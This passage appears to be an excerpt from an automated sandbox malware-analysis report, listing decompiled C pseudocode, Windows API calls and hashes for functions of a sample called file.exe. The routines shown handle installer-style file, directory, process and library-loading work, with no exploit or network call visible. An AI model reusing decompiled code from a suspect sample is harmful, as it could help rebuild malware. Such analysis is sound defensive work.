                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: File$Attributes$DeleteDirectoryRemove
                                                          • String ID:
                                                          • API String ID: 1655745494-0
                                                          • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                          • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                          • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                          • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00406AE0(void* __ecx, void* _a4) {
                                                          				long _v8;
                                                          				long _t6;
                                                          
                                                          				_t6 = WaitForSingleObject(_a4, 0x64);
                                                          				while(_t6 == 0x102) {
                                                          					E00406A71(0xf);
                                                          					_t6 = WaitForSingleObject(_a4, 0x64);
                                                          				}
                                                          				GetExitCodeProcess(_a4,  &_v8); // executed
                                                          				return _v8;
                                                          			}





                                                          0x00406af1
                                                          0x00406b08
                                                          0x00406afc
                                                          0x00406b06
                                                          0x00406b06
                                                          0x00406b13
                                                          0x00406b1f

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                          • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CodeExitProcess
                                                          • String ID:
                                                          • API String ID: 2567322000-0
                                                          • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                          • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                          • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                          • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                          				long _v8;
                                                          				long _t21;
                                                          				long _t22;
                                                          				void* _t24;
                                                          				long _t26;
                                                          				int _t27;
                                                          				long _t28;
                                                          				void* _t29;
                                                          				void* _t30;
                                                          				long _t31;
                                                          				long _t32;
                                                          				long _t36;
                                                          
                                                          				_t21 = _a4;
                                                          				if(_t21 >= 0) {
                                                          					_t32 = _t21 +  *0x42a2b8;
                                                          					 *0x420ef4 = _t32;
                                                          					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                          				}
                                                          				_t22 = E00403479(4);
                                                          				if(_t22 >= 0) {
                                                          					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                                          					if(_t24 == 0) {
                                                          						L18:
                                                          						_push(0xfffffffd);
                                                          						goto L19;
                                                          					} else {
                                                          						 *0x420ef4 =  *0x420ef4 + 4;
                                                          						_t36 = E00403479(_a4);
                                                          						if(_t36 < 0) {
                                                          							L21:
                                                          							_t22 = _t36;
                                                          						} else {
                                                          							if(_a12 != 0) {
                                                          								_t26 = _a4;
                                                          								if(_t26 >= _a16) {
                                                          									_t26 = _a16;
                                                          								}
                                                          								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                          								if(_t27 != 0) {
                                                          									_t36 = _v8;
                                                          									 *0x420ef4 =  *0x420ef4 + _t36;
                                                          									goto L21;
                                                          								} else {
                                                          									goto L18;
                                                          								}
                                                          							} else {
                                                          								if(_a4 <= 0) {
                                                          									goto L21;
                                                          								} else {
                                                          									while(1) {
                                                          										_t28 = _a4;
                                                          										if(_a4 >= 0x4000) {
                                                          											_t28 = 0x4000;
                                                          										}
                                                          										_v8 = _t28;
                                                          										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                                                          										if(_t29 == 0) {
                                                          											goto L18;
                                                          										}
                                                          										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                                          										if(_t30 == 0) {
                                                          											_push(0xfffffffe);
                                                          											L19:
                                                          											_pop(_t22);
                                                          										} else {
                                                          											_t31 = _v8;
                                                          											_a4 = _a4 - _t31;
                                                          											 *0x420ef4 =  *0x420ef4 + _t31;
                                                          											_t36 = _t36 + _t31;
                                                          											if(_a4 > 0) {
                                                          												continue;
                                                          											} else {
                                                          												goto L21;
                                                          											}
                                                          										}
                                                          										goto L22;
                                                          									}
                                                          									goto L18;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				L22:
                                                          				return _t22;
                                                          			}















                                                          0x00403375
                                                          0x0040337e
                                                          0x00403387
                                                          0x0040338b
                                                          0x00403396
                                                          0x00403396
                                                          0x0040339e
                                                          0x004033a5
                                                          0x004033b7
                                                          0x004033be
                                                          0x00403463
                                                          0x00403463
                                                          0x00000000
                                                          0x004033c4
                                                          0x004033c7
                                                          0x004033d3
                                                          0x004033d7
                                                          0x00403471
                                                          0x00403471
                                                          0x004033dd
                                                          0x004033e0
                                                          0x0040343f
                                                          0x00403445
                                                          0x00403447
                                                          0x00403447
                                                          0x00403459
                                                          0x00403461
                                                          0x00403468
                                                          0x0040346b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004033e2
                                                          0x004033e5
                                                          0x00000000
                                                          0x004033eb
                                                          0x004033f0
                                                          0x004033f7
                                                          0x004033fa
                                                          0x004033fc
                                                          0x004033fc
                                                          0x00403409
                                                          0x0040340c
                                                          0x00403413
                                                          0x00000000
                                                          0x00000000
                                                          0x0040341c
                                                          0x00403423
                                                          0x0040343b
                                                          0x00403465
                                                          0x00403465
                                                          0x00403425
                                                          0x00403425
                                                          0x00403428
                                                          0x0040342b
                                                          0x00403431
                                                          0x00403437
                                                          0x00000000
                                                          0x00403439
                                                          0x00000000
                                                          0x00403439
                                                          0x00403437
                                                          0x00000000
                                                          0x00403423
                                                          0x00000000
                                                          0x004033f0
                                                          0x004033e5
                                                          0x004033e0
                                                          0x004033d7
                                                          0x004033be
                                                          0x00403473
                                                          0x00403476

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                          • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                          • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                          • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E004015C1(short __ebx, void* __eflags) {
                                                          				void* _t17;
                                                          				int _t23;
                                                          				void* _t25;
                                                          				signed char _t26;
                                                          				short _t28;
                                                          				short _t31;
                                                          				short* _t34;
                                                          				void* _t36;
                                                          
                                                          				_t28 = __ebx;
                                                          				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                          				_t17 = E00405FE2(_t16);
                                                          				_t32 = _t17;
                                                          				if(_t17 != __ebx) {
                                                          					do {
                                                          						_t34 = E00405F64(_t32, 0x5c);
                                                          						_t31 =  *_t34;
                                                          						 *_t34 = _t28;
                                                          						if(_t31 != _t28) {
                                                          							L5:
                                                          							_t25 = E00405C16( *(_t36 + 8));
                                                          						} else {
                                                          							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                          							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
                                                          								goto L5;
                                                          							} else {
                                                          								_t25 = E00405B99( *(_t36 + 8)); // executed
                                                          							}
                                                          						}
                                                          						if(_t25 != _t28) {
                                                          							if(_t25 != 0xb7) {
                                                          								L9:
                                                          								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                          							} else {
                                                          								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                          								if((_t26 & 0x00000010) == 0) {
                                                          									goto L9;
                                                          								}
                                                          							}
                                                          						}
                                                          						 *_t34 = _t31;
                                                          						_t32 = _t34 + 2;
                                                          					} while (_t31 != _t28);
                                                          				}
                                                          				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                          					_push(0xfffffff5);
                                                          					E00401423();
                                                          				} else {
                                                          					E00401423(0xffffffe6);
                                                          					E00406668(0x436000,  *(_t36 + 8));
                                                          					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                          					if(_t23 == 0) {
                                                          						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                          					}
                                                          				}
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
                                                          				return 0;
                                                          			}











                                                          0x004015c1
                                                          0x004015c9
                                                          0x004015cc
                                                          0x004015d1
                                                          0x004015d5
                                                          0x004015d7
                                                          0x004015df
                                                          0x004015e1
                                                          0x004015e4
                                                          0x004015ea
                                                          0x00401604
                                                          0x00401607
                                                          0x004015ec
                                                          0x004015ec
                                                          0x004015ef
                                                          0x00000000
                                                          0x004015fa
                                                          0x004015fd
                                                          0x004015fd
                                                          0x004015ef
                                                          0x0040160e
                                                          0x00401615
                                                          0x00401624
                                                          0x00401624
                                                          0x00401617
                                                          0x0040161a
                                                          0x00401622
                                                          0x00000000
                                                          0x00000000
                                                          0x00401622
                                                          0x00401615
                                                          0x00401627
                                                          0x0040162b
                                                          0x0040162c
                                                          0x004015d7
                                                          0x00401634
                                                          0x00401663
                                                          0x004022f1
                                                          0x00401636
                                                          0x00401638
                                                          0x00401645
                                                          0x0040164d
                                                          0x00401655
                                                          0x0040165b
                                                          0x0040165b
                                                          0x00401655
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                            • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560,00000000), ref: 00405FF0
                                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                            • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                            • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                          • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                          • String ID:
                                                          • API String ID: 1892508949-0
                                                          • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                          • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                          • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                          • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 69%
                                                          			E00401389(signed int _a4) {
                                                          				intOrPtr* _t6;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          				signed int _t11;
                                                          				void* _t12;
                                                          				signed int _t16;
                                                          				signed int _t17;
                                                          				void* _t18;
                                                          
                                                          				_t17 = _a4;
                                                          				while(_t17 >= 0) {
                                                          					_t6 = _t17 * 0x1c +  *0x42a290;
                                                          					if( *_t6 == 1) {
                                                          						break;
                                                          					}
                                                          					_push(_t6); // executed
                                                          					_t8 = E00401434(); // executed
                                                          					if(_t8 == 0x7fffffff) {
                                                          						return 0x7fffffff;
                                                          					}
                                                          					_t10 = E0040136D(_t8);
                                                          					if(_t10 != 0) {
                                                          						_t11 = _t10 - 1;
                                                          						_t16 = _t17;
                                                          						_t17 = _t11;
                                                          						_t12 = _t11 - _t16;
                                                          					} else {
                                                          						_t12 = _t10 + 1;
                                                          						_t17 = _t17 + 1;
                                                          					}
                                                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                          						 *0x42924c =  *0x42924c + _t12;
                                                          						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
                                                          					}
                                                          				}
                                                          				return 0;
                                                          			}











                                                          0x0040138a
                                                          0x004013fa
                                                          0x0040139b
                                                          0x004013a0
                                                          0x00000000
                                                          0x00000000
                                                          0x004013a2
                                                          0x004013a3
                                                          0x004013ad
                                                          0x00000000
                                                          0x00401404
                                                          0x004013b0
                                                          0x004013b7
                                                          0x004013bd
                                                          0x004013be
                                                          0x004013c0
                                                          0x004013c2
                                                          0x004013b9
                                                          0x004013b9
                                                          0x004013ba
                                                          0x004013ba
                                                          0x004013c9
                                                          0x004013cb
                                                          0x004013f4
                                                          0x004013f4
                                                          0x004013c9
                                                          0x00000000

                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                          • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                          • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                          • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405C4B(WCHAR* _a4) {
                                                          				struct _PROCESS_INFORMATION _v20;
                                                          				int _t7;
                                                          
                                                          				0x426750->cb = 0x44;
                                                          				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
                                                          				if(_t7 != 0) {
                                                          					CloseHandle(_v20.hThread);
                                                          					return _v20.hProcess;
                                                          				}
                                                          				return _t7;
                                                          			}





                                                          0x00405c54
                                                          0x00405c74
                                                          0x00405c7c
                                                          0x00405c81
                                                          0x00000000
                                                          0x00405c87
                                                          0x00405c8b

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3712363035-0
                                                          • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                          • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                          • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                          • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00406A35(signed int _a4) {
                                                          				struct HINSTANCE__* _t5;
                                                          				signed int _t10;
                                                          
                                                          				_t10 = _a4 << 3;
                                                          				_t8 =  *(_t10 + 0x40a410);
                                                          				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
                                                          				if(_t5 != 0) {
                                                          					L2:
                                                          					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
                                                          				}
                                                          				_t5 = E004069C5(_t8); // executed
                                                          				if(_t5 == 0) {
                                                          					return 0;
                                                          				}
                                                          				goto L2;
                                                          			}





                                                          0x00406a3d
                                                          0x00406a40
                                                          0x00406a47
                                                          0x00406a4f
                                                          0x00406a5b
                                                          0x00000000
                                                          0x00406a62
                                                          0x00406a52
                                                          0x00406a59
                                                          0x00000000
                                                          0x00406a6a
                                                          0x00000000

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                            • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                            • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                            • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                          • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                          • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                          • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E00406158(WCHAR* _a4, long _a8, long _a12) {
                                                          				signed int _t5;
                                                          				void* _t6;
                                                          
                                                          				_t5 = GetFileAttributesW(_a4); // executed
                                                          				asm("sbb ecx, ecx");
                                                          				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                          				return _t6;
                                                          			}





                                                          0x0040615c
                                                          0x00406169
                                                          0x0040617e
                                                          0x00406184

                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040615C
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                          • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                          • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                          • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00406133(WCHAR* _a4) {
                                                          				signed char _t3;
                                                          				signed char _t7;
                                                          
                                                          				_t3 = GetFileAttributesW(_a4); // executed
                                                          				_t7 = _t3;
                                                          				if(_t7 != 0xffffffff) {
                                                          					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                                                          				}
                                                          				return _t7;
                                                          			}





                                                          0x00406138
                                                          0x0040613e
                                                          0x00406143
                                                          0x0040614c
                                                          0x0040614c
                                                          0x00406155

                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                          • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
